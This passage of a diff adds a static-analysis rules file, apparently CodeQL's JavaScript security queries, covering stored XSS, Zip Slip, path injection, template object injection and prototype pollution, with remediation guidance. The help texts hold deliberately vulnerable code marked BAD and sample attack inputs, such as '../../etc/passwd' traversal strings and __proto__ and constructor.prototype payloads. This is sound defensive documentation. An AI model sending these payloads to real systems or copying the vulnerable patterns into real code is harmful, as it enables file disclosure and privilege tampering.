'\n res.send(list);\n });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Using uncontrolled stored values in HTML allows for\n a stored cross-site scripting vulnerability.", + "id" : "js/stored-xss", + "kind" : "path-problem", + "name" : "Stored cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/zipslip", + "name" : "js/zipslip", + "shortDescription" : { + "text" : "Arbitrary file access during archive extraction (\"Zip Slip\")" + }, + "fullDescription" : { + "text" : "Extracting files from a malicious ZIP file, or similar type of archive, without validating that the destination file path is within the destination directory can allow an attacker to unexpectedly gain access to resources." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // BAD: This could write any file on the filesystem.\n entry.pipe(fs.createWriteStream(fileName));\n });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // GOOD: ensures the path is safe to write to.\n if (fileName.indexOf('..') == -1) {\n entry.pipe(fs.createWriteStream(fileName));\n }\n else {\n console.log('skipping bad path', fileName);\n }\n });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n", + "markdown" : "# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // BAD: This could write any file on the filesystem.\n entry.pipe(fs.createWriteStream(fileName));\n });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // GOOD: ensures the path is safe to write to.\n if (fileName.indexOf('..') == -1) {\n entry.pipe(fs.createWriteStream(fileName));\n }\n else {\n console.log('skipping bad path', fileName);\n }\n });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-022" ], + "description" : "Extracting files from a malicious ZIP file, or similar type of archive, without\n validating that the destination file path is within the destination directory\n can allow an attacker to unexpectedly gain access to resources.", + "id" : "js/zipslip", + "kind" : "path-problem", + "name" : "Arbitrary file access during archive extraction (\"Zip Slip\")", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/path-injection", + "name" : "js/path-injection", + "shortDescription" : { + "text" : "Uncontrolled data used in path expression" + }, + "fullDescription" : { + "text" : "Accessing paths influenced by users can allow an attacker to access unexpected resources." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n", + "markdown" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-023", "external/cwe/cwe-036", "external/cwe/cwe-073", "external/cwe/cwe-099" ], + "description" : "Accessing paths influenced by users can allow an attacker to access\n unexpected resources.", + "id" : "js/path-injection", + "kind" : "path-problem", + "name" : "Uncontrolled data used in path expression", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/template-object-injection", + "name" : "js/template-object-injection", + "shortDescription" : { + "text" : "Template Object Injection" + }, + "fullDescription" : { + "text" : "Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', {\n name: profile.name,\n location: profile.location\n });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", + "markdown" : "# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', {\n name: profile.name,\n location: profile.location\n });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-073", "external/cwe/cwe-094" ], + "description" : "Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution.", + "id" : "js/template-object-injection", + "kind" : "path-problem", + "name" : "Template Object Injection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.3" + } + }, { + "id" : "js/prototype-polluting-assignment", + "name" : "js/prototype-polluting-assignment", + "shortDescription" : { + "text" : "Prototype-polluting assignment" + }, + "fullDescription" : { + "text" : "Modifying an object obtained via a user-controlled property name may lead to accidental mutation of the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos.get(id);\n if (!items) {\n items = new Map();\n req.sessions.todos.set(id, items);\n }\n items.set(req.query.name, req.query.text);\n res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n res.end(403);\n return;\n }\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", + "markdown" : "# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos.get(id);\n if (!items) {\n items = new Map();\n req.sessions.todos.set(id, items);\n }\n items.set(req.query.name, req.query.text);\n res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n res.end(403);\n return;\n }\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], + "description" : "Modifying an object obtained via a user-controlled property name may\n lead to accidental mutation of the built-in Object prototype,\n and possibly escalate to remote code execution or cross-site scripting.", + "id" : "js/prototype-polluting-assignment", + "kind" : "path-problem", + "name" : "Prototype-polluting assignment", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/prototype-pollution-utility", + "name" : "js/prototype-pollution-utility", + "shortDescription" : { + "text" : "Prototype-polluting function" + }, + "fullDescription" : { + "text" : "Functions recursively assigning properties on objects may be the cause of accidental modification of a built-in prototype object." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (key === \"__proto__\" || key === \"constructor\") continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", + "markdown" : "# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (key === \"__proto__\" || key === \"constructor\") continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], + "description" : "Functions recursively assigning properties on objects may be\n the cause of accidental modification of a built-in prototype object.", + "id" : "js/prototype-pollution-utility", + "kind" : "path-problem", + "name" : "Prototype-polluting function", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/prototype-pollution", + "name" : "js/prototype-pollution", + "shortDescription" : { + "text" : "Prototype-polluting merge call" + }, + "fullDescription" : { + "text" : "Recursively merging a user-controlled object into another object can allow an attacker to modify the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. Such a call can modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n \"dependencies\": {\n \"lodash\": \"^4.17.12\"\n }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let config = lodash.merge({}, {\n prefs: req.query.prefs\n });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: 